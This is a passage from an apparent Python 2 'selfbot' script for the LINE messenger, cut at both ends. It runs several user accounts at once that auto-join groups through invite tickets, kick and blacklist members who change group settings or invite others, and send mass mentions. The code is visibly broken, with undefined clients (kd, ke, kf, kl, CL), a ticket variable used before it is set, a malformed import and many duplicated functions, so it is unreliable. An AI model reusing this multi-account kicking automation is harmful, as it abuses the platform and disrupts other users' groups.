╠➩ 'nl' : 'Dutch'
╠➩ 'en' : 'English'
╠➩ 'enau' : 'English (Australia)'
╠➩ 'enuk' : 'English (United Kingdom)'
╠➩ 'enus' : 'English (United States)'
╠➩ 'eo' : 'Esperanto'
╠➩ 'fi' : 'Finnish'
╠➩ 'fr' : 'French'
╠➩ 'de' : 'German'
╠➩ 'el' : 'Greek'
╠➩ 'hi' : 'Hindi'
╠➩ 'hu' : 'Hungarian'
╠➩ 'is' : 'Icelandic'
╠➩ 'id' : 'Indonesian'
╠➩ 'it' : 'Italian'
╠➩ 'jp' : 'Japanese'
╠➩ 'km' : 'Khmer (Cambodian)'
╠➩ 'ko' : 'Korean'
╠➩ 'la' : 'Latin'
╠➩ 'lv' : 'Latvian'
╠➩ 'mk' : 'Macedonian'
╠➩ 'no' : 'Norwegian'
╠➩ 'pl' : 'Polish'
╠➩ 'pt' : 'Portuguese'
╠➩ 'ro' : 'Romanian'
╠➩ 'ru' : 'Russian'
╠➩ 'sr' : 'Serbian'
╠➩ 'si' : 'Sinhala'
╠➩ 'sk' : 'Slovak'
╠➩ 'es' : 'Spanish'
╠➩ 'eses' : 'Spanish (Spain)'
╠➩ 'esus' : 'Spanish (United States)'
╠➩ 'sw' : 'Swahili'
╠➩ 'sv' : 'Swedish'
╠➩ 'ta' : 'Tamil'
╠➩ 'th' : 'Thai'
╠➩ 'tr' : 'Turkish'
╠➩ 'uk' : 'Ukrainian'
╠➩ 'vi' : 'Vietnamese'
╠➩ 'cy' : 'Welsh'
╚═════════════════
"""
KAC=[cl,ki,kk,kc,ks,kt]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = ks.getProfile().mid
Emid = kt.getProfile().mid
#Fmid = kl.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,"u78e5efff85bf97393cc2c4b8ecf93d25","ub5ae780d74acdd2c05b750ef7fb4ae31","u2355fb85d6b43785e0b7770f956d0347"]
admin = ["u78e5efff85bf97393cc2c4b8ecf93d25","ub5ae780d74acdd2c05b750ef7fb4ae31","u2355fb85d6b43785e0b7770f956d0347"]
owner = ["u78e5efff85bf97393cc2c4b8ecf93d25","ub5ae780d74acdd2c05b750ef7fb4ae31","u2355fb85d6b43785e0b7770f956d0347"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True, "members":1},
'leaveRoom':False,
'timeline':True,
'autoAdd':False,
'message':"Thanks for add Me",
"lang":"JP",
"comment":"AutoLike by ●▬▬▬▬๑۩A̴M̴I̴I̴ T̴E̴A̴M̴B̴O̴T̴۩๑▬▬▬▬▬●",
"welmsg":"welcome to group",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"status":False,
"likeOn":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"welcomemsg":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"tag":False,
"autorein":True,
"pelaku":False,
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{},
'copy':False,
'target':{},
'midstarget':{},
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kt.getProfile()
backup = kt.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d hour %02d minute %02d seconds' % (hours, mins, secs)
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
import urllib,request #urllib library for Extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib,request.Request(url, headers = headers)
resp = urllib,request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "Mention"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = kt.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
kt.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kt.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
kd.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in mid:
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
#=====================================================================================
if op.param3 in mid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
X = ks.getGroup(op.param1)
X.preventJoinByTicket = False
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
CL.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
X = kt.getGroup(op.param1)
X.preventJoinByTicket = False
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
#======================================================
if op.param3 in Bmid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
G = kc.getGroup(op.param1)
G.preventJoinByTicket = False
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Emid:
G = kt.getGroup(op.param1)
G.preventJoinByTicket = False
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
#=========================================================================
if op.type == 15:
if wait["autorein"] == True:
if op.param2 in admin:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
kicker.inviteIntoGroup(op.param1,[op.param2])
#===========================================
if op.type == 32:
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if Amid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki.cancelGroupInvitation(op.param1, matched_list)
if Bmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kk.cancelGroupInvitation(op.param1, matched_list)
if Cmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("^^",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kc.cancelGroupInvitation(op.param1, matched_list)
if op.type == 17:
if op.param3 in wait["blacklist"]:
if not op.param2 in Bots and admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
cl.sendText(op.param1,"blacklist users are not allowed to sign in -_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param3}
cl.sendMessage(c)
if op.type == 17:
if wait["welcomemsg"] == True:
if op.param2 not in Bots:
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1,cl.getContact(op.param2).displayName + wait["welmsg"]+ str(ginfo.name))
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
kicker.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = True
kicker.updateGroup(G)
cl.sendText(op.param1,"please do not open link group-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
except Exception, e:
print e
if op.type == 13:
G = cl.getGroup(op.param1)
I = G.creator
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(op.param1, gInviMids)
kicker.kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1,"you are prohibited from inviting-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 11:
if wait["pelaku"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if wait["pelaku"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 19:
if wait["pelaku"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
print "mnunjukan plaku"
if op.type == 15:
if op.param2 in admin:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param2])
if op.type == 19:
if op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
if op.type == 19:
if not op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.type == 19:
if not op.param2 in Bots:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
kicker.updateGroup(G)
invsend = 0
Ticket = kicker.reissueGroupTicket(op.param1)
kl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.2)
X = kicker.getGroup(op.param1)
X.preventJoinByTicket = True
kl.kickoutFromGroup(op.param1,[op.param2])
kicker.kickoutFromGroup(op.param1,[op.param2])
kl.leaveGroup(op.param1)
kicker.updateGroup(X)
except Exception, e:
print e
if not op.param2 in Bots and admin:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki.getGroup(op.param1)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kk.getGroup(op.param1)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
kd.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
ke.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
